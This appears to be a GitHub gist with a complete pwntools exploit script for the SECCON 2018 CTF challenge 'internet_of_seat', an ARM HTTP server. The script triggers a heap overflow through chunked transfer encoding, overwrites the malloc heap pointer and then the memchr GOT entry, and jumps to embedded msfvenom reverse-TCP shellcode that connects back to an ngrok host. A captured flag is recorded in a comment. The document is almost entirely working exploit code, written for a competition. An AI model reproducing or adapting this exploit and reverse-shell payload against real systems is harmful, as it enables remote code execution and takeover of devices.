/internet_of_seat.py
Last active Nov 2, 2018
SECCON 2018 internet_of_seat - https://score-quals.seccon.jp/challenges#internet_of_seat
| #!/usr/bin/env python2 | |
| # pylint: skip-file | |
| """ | |
| When performing a chunked transfer, realloc doesnt take into account the size of the headers allowing an overflow. | |
| As the initial heap (0x100) is located inline we can overwrite the current heap location. | |
| * overwrite __malloc_heap to point to our fake heap | |
| * our fake heap size is huge so that memory os returned near the GOT | |
| * overwrite memchr got with shellcode address | |
| * win | |
| """ | |
| from pwn import * | |
| def exploit(): | |
| # send a request to get the heap adress | |
| p.send("G / H\n\n\n") | |
| p.recvuntil("hello world") | |
| if len(sys.argv) > 1: | |
| r.recvuntil("recv: 00004 (0x") | |
| offset = int(r.recvuntil(")", drop=True), 16) | |
| else: | |
| offset = int(raw_input(), 0) | |
| # address of fake __malloc_heap+4 | |
| offset += 0x100 | |
| payload = "\x00" + p32(0) + p32(offset) + p32(offset - 0x11D00) | |
| payload = payload.ljust(0x30, "\x00") | |
| # start a chunked transfer | |
| p.send("P /echo H\nTransfer-Encoding:chunked\nA:{}\n\n".format("A"*8)) | |
| sleep(1) | |
| # overwrite __malloc_heap with fake one | |
| # fake size will cause malloc to return binary got | |
| p.send("{}\n{}\n".format(hex(len(payload))[2:], payload)) | |
| sleep(1) | |
| # overwrite memchr with payload addrds | |
| # section is rwx | |
| payload2 = cyclic(136) | |
| payload2 += p32(0x00011e04) | |
| # add reverse tcp shell for armv6 | |
| payload2 += asm(shellcraft.nop()*0x10) | |
| payload2 += buf | |
| p.send(payload2) | |
| p.interactive() | |
| """ | |
| Connection from 127.0.0.1:59116 | |
| cat /flag.txt | |
| SECCON{5ea4f1ee2820cf8d6151937236f8f69e} | |
| """ | |
| if __name__ == "__main__": | |
| context.terminal=["tmux", "sp", "-h"] | |
| context.arch = "arm" | |
| context.os = "linux" | |
| # msfvenom --arch armle --payload linux/armle/shell_reverse_tcp --format py --platform linux LHOST=0.tcp.ngrok.io LPORT=14612 | |
| buf = "" | |
| buf += "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c" | |
| buf += "\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60" | |
| buf += "\xa0\xe1\x60\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0" | |
| buf += "\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1" | |
| buf += "\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06" | |
| buf += "\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00" | |
| buf += "\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0" | |
| buf += "\xe3\x00\x00\x00\xef\x24\x00\x8f\xe2\x04\x40\x24\xe0" | |
| buf += "\x10\x00\x2d\xe9\x0d\x20\xa0\xe1\x24\x40\x8f\xe2\x10" | |
| buf += "\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00" | |
| buf += "\x00\xef\x02\x00\x39\x14\x34\x0f\xb7\x95\x2f\x62\x69" | |
| buf += "\x6e\x2f\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00" | |
| buf += "\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" | |
| buf += "\x00\x00\x00" | |
| if len(sys.argv) > 1: | |
| r = remote("internet-of-seat.pwn.seccon.jp", 1337) | |
| r.sendlineafter(">>", "0") | |
| r.recvuntil("Your port: ", drop=True) | |
| port = int(r.recvline(keepends=False)) | |
| r.recvuntil("8888...") | |
| p = remote("internet-of-seat.pwn.seccon.jp", port) | |
| else: | |
| p = remote("localhost", 8888) | |
| exploit() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment